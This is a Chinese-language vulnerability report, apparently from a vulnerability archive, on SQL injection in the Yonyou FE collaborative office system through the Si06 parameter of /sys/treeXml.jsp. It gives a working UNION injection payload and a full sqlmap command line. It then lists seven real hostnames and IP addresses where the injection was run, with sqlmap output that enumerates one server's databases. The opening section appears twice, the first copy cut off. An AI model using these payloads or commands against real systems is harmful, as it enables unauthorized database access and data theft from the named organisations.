VULHUB ™

### 简要描述： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞 ### 详细说明： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞，可直接union注入 ``` 注入链接：/sys/treeXml.jsp?Si06=1&type=sort 注入参数：Si06 Payload： Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort Sqlmap命令： python sqlmap.py -u 'http://xxxx//sys/treeXml.jsp?Si06=1&type=sort' -p Si06 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=14 --dbs --threads 10 --batch -v 3 ``` ### 漏洞证明： ``` (1)http://oa.hzuf.com:9090 UNION注入： http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/01005456250377cef47ec67a334d1609bfd8dbfb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01005456250377cef47ec67a334d1609bfd8dbfb.png) ``` Sqlmap注入： $ python sqlmap.py -u 'http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1&type=sort' -p Si06 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=14 --dbs...

### 简要描述： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞 ### 详细说明： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞，可直接union注入 ``` 注入链接：/sys/treeXml.jsp?Si06=1&type=sort 注入参数：Si06 Payload： Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort Sqlmap命令： python sqlmap.py -u 'http://xxxx//sys/treeXml.jsp?Si06=1&type=sort' -p Si06 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=14 --dbs --threads 10 --batch -v 3 ``` ### 漏洞证明： ``` (1)http://oa.hzuf.com:9090 UNION注入： http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/01005456250377cef47ec67a334d1609bfd8dbfb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01005456250377cef47ec67a334d1609bfd8dbfb.png) ``` Sqlmap注入： $ python sqlmap.py -u 'http://oa.hzuf.com:9090/sys/treeXml.jsp?Si06=1&type=sort' -p Si06 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=14 --dbs --threads 10 --batch -v 1 --- Place: GET Parameter: Si06 Type: UNION query Title: Generic UNION query (NULL) - 14 columns (custom) Payload: Si06=1' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(103)+CHAR(106)+CHAR(97)+CHAR(113)+CHAR(98)+CHAR(89)+CHAR(114)+CHAR(104)+CHAR(111)+CHAR(110)+CHAR(87)+CHAR(103)+CHAR(73)+CHAR(122)+CHAR(113)+CHAR(102)+CHAR(111)+CHAR(117)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &type=sort --- [00:46:07] [INFO] testing Microsoft SQL Server [00:46:07] [INFO] confirming Microsoft SQL Server [00:46:07] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: Servlet 2.4, Tomcat 4.0.4., JSP back-end DBMS: Microsoft SQL Server 2005 [00:46:07] [INFO] fetching database names available databases [11]: [*] FE_APP5 [*] FE_BASE5 [*] FE_ERP [*] master [*] model [*] msdb [*] ncdb [*] oa [*] ReportServer [*] ReportServerTempDB [*] tempdb ``` [<img src="https://images.seebug.org/upload/201411/010055048a3bee96331ece751afb8232cd4c379e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/010055048a3bee96331ece751afb8232cd4c379e.png) ``` （2）http://fsd2014.f3322.org:9090 http://fsd2014.f3322.org:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/0100552057639dead79b3e1d330fc0a8d80229cf.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0100552057639dead79b3e1d330fc0a8d80229cf.png) ``` （3）http://119.145.194.122:9090 http://119.145.194.122:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/0100553960a1fc88d2529ddfdd47c7132ab8f526.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0100553960a1fc88d2529ddfdd47c7132ab8f526.png) ``` （4）http://oa.chnjcdc.com:9090 http://oa.chnjcdc.com:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/01005607f47ea97b2df0234d3ad9afdfee6e81f6.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01005607f47ea97b2df0234d3ad9afdfee6e81f6.png) ``` （5）http://183.129.249.246:9090 http://183.129.249.246:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/01005612a4cd1436823105983b35e4430e9f5857.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01005612a4cd1436823105983b35e4430e9f5857.png) ``` （6）http://218.205.208.22:9090 http://218.205.208.22:9090/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/01005632e092ce314f7367b4edcb21d3390fbe3f.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01005632e092ce314f7367b4edcb21d3390fbe3f.png) ``` （7）http://120.196.116.3:7321 http://120.196.116.3:7321/sys/treeXml.jsp?Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort ``` [<img src="https://images.seebug.org/upload/201411/01005640d113a88d6aa97315b5cdf0ee20371ab3.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/01005640d113a88d6aa97315b5cdf0ee20371ab3.png) ``` ```